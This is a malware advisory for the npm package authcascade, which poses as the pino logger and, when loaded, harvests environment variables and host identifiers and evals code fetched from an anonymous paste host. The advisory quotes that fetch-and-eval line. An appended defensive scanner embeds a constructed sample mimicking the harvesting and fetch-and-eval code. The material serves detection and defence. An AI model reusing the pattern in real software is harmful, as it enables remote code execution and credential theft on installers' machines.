authcascade @1.5.26
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-4491
Ecosystem
npm
Summary
On require('authcascade'), the package's main entry pino.js loads lib/writer.js, which (a) builds a data object containing the full process.env, the OS platform, hostname, username and all non-internal MAC addresses, and (b) fetches a base64-decoded URL (https://www.jsonkeeper.com/b/PJNZP) via axios.get and passes the response body directly to eval():

require('axios').get(atob(...)).then(r => { eval(r.data.data); })

A second hex-obfuscated jsonkeeper.com URL (/b/HY6M6) is staged in the same module. jsonkeeper.com is an anonymous, mutable JSON paste host: the maintainer can swap in arbitrary JavaScript at any moment, and it then executes in the same scope as the harvested host fingerprint and environment variables (CI secrets, AWS/GitHub/npm tokens, etc.). The result is attacker-controlled remote code execution and credential theft on every host that installs and loads the package. Because the payload is fetched at load time rather than shipped in the tarball, what a given host actually executed cannot be recovered from the package alone; any secret present in the environment of a process that loaded it should be treated as exposed.

The package additionally impersonates the legitimate pino logger: package.json sets main to pino.js and homepage to https://getpino.io, and the lib/ tree mirrors pino's source layout (proto.js, levels.js, redaction.js, multistream.js, transport.js, worker.js, tools.js). The combination of identity spoofing, import-time fetch-and-eval from a mutable anonymous host, and bulk environment/host-identifier collection is an unambiguous supply-chain attack.
Source: amazon-inspector (8fece3d89e066c6c3452fda608e77747b7d4fa4cbbf6498fd41e5a5a765d57d9)
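The behaviour described above lends itself to a static triage check. The following is an added example, not code from this advisory, from osv.dev or Amazon Inspector, or from the package itself: a small JavaScript scanner that looks for the three indicators the report combines (obfuscated string literals that decode to a URL on an anonymous paste host, eval() fed from an HTTP response, and wholesale process.env plus os.* host-identifier collection), together with a package.json check for the impersonation pattern. The sample source it scans is constructed to mimic the described shape of lib/writer.js and is not the real file; the PASTE_HOSTS entries other than jsonkeeper.com, the regex heuristics and all function names are assumptions made for this example.

```javascript
'use strict';
// Added example (not the advisory's or the package's code): heuristic static
// triage for the import-time fetch-and-eval pattern. A hit means "look closer",
// not "proven malicious".

// Assumed list of anonymous, mutable paste hosts. jsonkeeper.com is the host
// named in the report; the others are assumptions for illustration.
const PASTE_HOSTS = ['jsonkeeper.com', 'pastebin.com', 'paste.ee'];

// Turn a literal like \x68\x74\x74\x70 (as it appears in source text) into text.
function fromHexEscapes(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Each decoder: regex over the raw source, group 1 = quote char, group 2 = payload.
const DECODERS = [
  { kind: 'base64', re: /(?:atob|Buffer\.from)\(\s*(['"`])([A-Za-z0-9+/]{12,}={0,2})\1/g,
    decode: p => Buffer.from(p, 'base64').toString('utf8') },
  { kind: 'hex-literal', re: /Buffer\.from\(\s*(['"`])((?:[0-9a-fA-F]{2}){8,})\1\s*,\s*['"`]hex['"`]/g,
    decode: p => Buffer.from(p, 'hex').toString('utf8') },
  { kind: 'hex-escape', re: /(['"`])((?:\\x[0-9a-fA-F]{2}){8,})\1/g,
    decode: fromHexEscapes },
];

// Decode every obfuscated literal and keep the ones that turn out to be URLs.
function decodedUrls(src) {
  const out = [];
  for (const d of DECODERS) {
    for (const m of src.matchAll(d.re)) {
      let text;
      try { text = d.decode(m[2]); } catch { continue; }
      if (/^https?:\/\//.test(text)) out.push({ kind: d.kind, url: text });
    }
  }
  return out;
}

// Scan one module's source text; returns a list of { rule, detail } findings.
function scanSource(src) {
  const findings = [];
  for (const u of decodedUrls(src)) {
    let host;
    try { host = new URL(u.url).hostname; } catch { continue; }
    const paste = PASTE_HOSTS.some(h => host === h || host.endsWith('.' + h));
    findings.push({ rule: paste ? 'obfuscated-paste-host-url' : 'obfuscated-url',
                    detail: `${u.kind} -> ${u.url}` });
  }
  // HTTP client present (axios/got/node-fetch/http(s)/request import, or fetch()) ...
  const network = /require\(\s*['"`](?:axios|got|node-fetch|https?|request)['"`]\s*\)|\bfetch\s*\(/.test(src);
  // ... together with dynamic code execution in the same module.
  const evalCall = /\beval\s*\(|\bnew\s+Function\s*\(/.test(src);
  if (network && evalCall) {
    findings.push({ rule: 'eval-of-network-response',
                    detail: 'eval()/Function() and an HTTP client in the same module' });
  }
  // process.env used as a whole object (not process.env.NAME / process.env[...]).
  const envDump = /process\.env\b(?!\s*\.\s*\w|\s*\[)/.test(src);
  const hostId = /\bos\.(?:networkInterfaces|hostname|userInfo|platform)\s*\(/.test(src);
  if (envDump && hostId) {
    findings.push({ rule: 'env-and-host-fingerprint',
                    detail: 'whole process.env collected alongside os.* host identifiers' });
  }
  return findings;
}

// Assumed heuristic for the impersonation pattern: the main entry is named after
// a different package and the homepage host references that other name too.
function checkManifest(pkg) {
  const stem = String(pkg.main || 'index.js').split('/').pop().replace(/\.[cm]?js$/i, '');
  if (stem === 'index' || stem === pkg.name) return [];
  let host = '';
  try { host = new URL(pkg.homepage).hostname; } catch { /* missing or invalid homepage */ }
  if (!host.includes(stem)) return [];
  return [{ rule: 'metadata-impersonates-other-package',
            detail: `main ${pkg.main} and homepage host ${host} both reference "${stem}", not "${pkg.name}"` }];
}

// Constructed sample input (NOT the real lib/writer.js), shaped like the report's description.
const SAMPLE_URL = 'https://www.jsonkeeper.com/b/PJNZP';
const SAMPLE_URL_2 = 'https://www.jsonkeeper.com/b/HY6M6';
const b64 = Buffer.from(SAMPLE_URL).toString('base64');
const hexEsc = [...SAMPLE_URL_2].map(c => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const SAMPLE_SRC = `
const os = require('os');
const data = { env: process.env, platform: os.platform(), host: os.hostname(),
  user: os.userInfo().username,
  macs: Object.values(os.networkInterfaces()).flat().filter(i => !i.internal).map(i => i.mac) };
require('axios').get(atob('${b64}')).then(r => { eval(r.data.data); });
const backup = "${hexEsc}";
`;
// Constructed benign control: reads one env var and the hostname, no network, no eval.
const BENIGN_SRC = `
const os = require('os');
const level = process.env.LOG_LEVEL || 'info';
module.exports = { level, host: os.hostname() };
`;
// Manifest fields as stated in the report.
const SAMPLE_MANIFEST = { name: 'authcascade', version: '1.5.26', main: 'pino.js', homepage: 'https://getpino.io' };

console.log(JSON.stringify({ writer: scanSource(SAMPLE_SRC), benign: scanSource(BENIGN_SRC),
                             manifest: checkManifest(SAMPLE_MANIFEST) }, null, 2));
```

Run against the constructed sample, scanSource returns four findings (two paste-host URLs, the eval-plus-HTTP-client pairing, and the env/host fingerprint) and nothing for the benign control; checkManifest flags the pino-named main entry and getpino.io homepage under a different package name. In a real pipeline the same functions would be run over every .js file and the package.json of each tarball in the lockfile, and a hit on obfuscated-paste-host-url combined with eval-of-network-response is a strong enough signal to block the install pending manual review.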